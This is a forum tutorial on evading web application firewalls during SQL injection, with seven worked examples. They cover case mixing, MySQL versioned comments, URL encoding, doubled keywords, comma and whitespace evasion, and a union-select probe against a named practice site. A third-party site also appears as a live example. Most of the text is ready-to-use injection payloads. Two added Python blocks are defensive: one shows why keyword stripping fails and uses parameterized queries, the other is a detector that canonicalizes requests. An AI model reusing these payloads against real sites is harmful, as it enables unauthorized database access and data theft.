Now I'll show the different WAFs we face while injecting sites, with some examples:
example (1)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]
So here the word blocked by the firewall is "uNiOn", so your query should be like:
http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -
Note: sometimes using a combination of uppercase and lowercase will bypass the WAF,
so always use a combination of uppercase and lowercase,
like: uNiOn SeLeCt
example (2)
http://www.site.com/php?id=2 uNiOn-- - [no waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt [waf]
So here the firewall is blocking the combined use of union and select, so the
WAF bypass should be applied between the words union and select:
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
(or)
http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -
%23 => URL-encoded form of #
and
%0A => line feed
%23 (#) starts a comment that runs to the end of the line, so following it with a line feed (%0A) ends the comment and the rest of our query still works.
Sometimes even after using
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]
it blocks the query, so better use
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -
example (3)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]
Now let's try to bypass this:
http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]
Now let's try using URL encoding:
http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]
http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]
Here %75 => u and %73 => s (URL-encoded form).
example (4)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2,3,4,5-- - [waf]
Let's go step by step:
http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]
If you observe, the WAF appeared after using a comma (,). Let's try to bypass this:
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - (no waf)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
(or)
http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
example (5)
I see some injectors using uNunionIOn without knowing the purpose of using it.
When do you have to use uNunionIOn?
Let's see.
If you observe, whenever our query is incomplete the site will show an error on the page.
example
http://www.cobranet.org/about.php?id=1 union-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
You're getting this error because your query is incomplete, but on some sites when you use
http://www.site.com/php?id=2 union-- -
result >> the page does not show any error and loads normally. It means the
word union is being removed or escaped from our query; in such a case we can use
uNuNionNion
And on some sites specific letters will be escaped.
Let's see this on a live site:
http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOn-- -
result >>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
From the above error you can see some letters in the word union are being escaped,
so the letters being escaped have to be used twice to bypass this:
http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOnon-- - [bypassed]
result >> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
http://zixem.altervista.org/SQLi/level3.php?item=-3' uNiOnon select 1,2,3,4-- -
and we got the vulnerable columns.
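Why doubling works, and what to do instead, as an added example (not code from the original post or from the sites it mentions): a filter that deletes a blocked word in one pass can leave that same word behind, so the fix is to reject bad input and bind the value as a parameter. The keyword list, table and function names are assumptions, and sqlite3 stands in for the MySQL driver.

```python
import re
import sqlite3

BLOCKED = ("union", "select")  # assumed keyword list for the filter being modelled


def strip_once(value):
    """Flawed filter: deletes each blocked word in a single pass."""
    for word in BLOCKED:
        value = re.sub(word, "", value, flags=re.IGNORECASE)
    return value


def still_contains_keyword(value):
    """True when a blocked word survives (or is re-formed by) the filter."""
    return any(word in value.lower() for word in BLOCKED)


def demo_db():
    """Constructed in-memory table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO items VALUES (2, 'widget')")
    return conn


def fetch_item(conn, raw_id):
    """Hardened path: allow-list the type, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative integer")
    row = conn.execute("SELECT name FROM items WHERE id = ?", (int(raw_id),))
    return row.fetchone()


if __name__ == "__main__":
    filtered = strip_once("2 uNunionIOn-- -")   # string taken from the text above
    print(repr(filtered), still_contains_keyword(filtered))
    print(fetch_item(demo_db(), "2"))
```

Removing text changes the input into something the developer never inspected; rejecting it and using a bound parameter means the value is never parsed as SQL at all.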
example (6)
Sometimes the word union or select does not get bypassed even
after we have tried all the alternatives; then using some special
characters may bypass the WAF:
uni<>on sel<>ect
uni*on sel*ect
(uni)(on) (sel)(ect)
uni[]on sel[]ect
uni\on sel\ect etc.
example (7)
On some sites we face a whitespace block, meaning that whenever we use a space the
WAF triggers. There we can use a comment with an odd number of asterisks (/*****/) in place of spaces,
or we can use
%0b
%0d
%C0 etc
>> www.site.com/php?id=2/*****/uNiOn/*****/select/*****/1,2,3,4,5-- -
www.site.com/php?id=2%0bunion%0bselect%0b1,2,3,4,5-- - etc
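Seen from the defending side, examples 1 to 4 and 7 all work because the filter matches the raw request while MySQL sees the decoded, comment-stripped query. The sketch below is an added example (not from the original post or from any WAF product) that canonicalizes a parameter value before matching; the function names and sample strings are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Patterns for the MySQL syntax this tutorial relies on.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # /*!50000union*/ runs its body
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)    # /**/ and /*****/ act as a space
HASH_COMMENT = re.compile(r"#[^\n]*")             # '#' comment ends at the line feed
UNION_SELECT = re.compile(
    r"\bunion\b[\s(]*(?:(?:all|distinct|distinctrow)\b[\s(]*)?select\b"
)


def canonicalize(value, max_rounds=3):
    """Reduce a raw parameter value to roughly what the SQL parser will see."""
    for _ in range(max_rounds):          # decode repeatedly, but with a bound
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = VERSIONED.sub(r" \1 ", value)    # keep the executable body
    value = BLOCK_COMMENT.sub(" ", value)
    value = HASH_COMMENT.sub(" ", value)
    value = re.sub(r"\s+", " ", value)       # \s also covers %0a, %0b, %0d
    return value.lower().strip()


def is_union_select(value):
    """True if the canonical form has UNION [ALL|DISTINCT|DISTINCTROW] SELECT."""
    return UNION_SELECT.search(canonicalize(value)) is not None


# Constructed samples modelled on the query strings shown above.
SAMPLES = [
    "2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -",
    "2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -",
    "2 %75nIOn %73eLeCt-- -",
    "2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- -",
    "2/*****/uNiOn/*****/select/*****/1,2,3,4,5-- -",
    "2%0bunion%0bselect%0b1,2,3,4,5-- -",
    "student union selection committee",   # benign, must not match
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(is_union_select(sample), repr(canonicalize(sample)))
```

Matching on the canonical form is a detection aid only; the query itself should still be built with bound parameters.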
The tutorial is getting bigger, so I'll continue it in the second part of the WAF bypassing.
Hope you understood.
[Credits to masters yogesh bhagat sir, geek kid, aakash choudhary; I learned WAF bypassing from these people.]
Please give your feedback about my tutorial, thank you.
Cya.
source http://forum.sqliwiki.com/showthread.php?tid=4001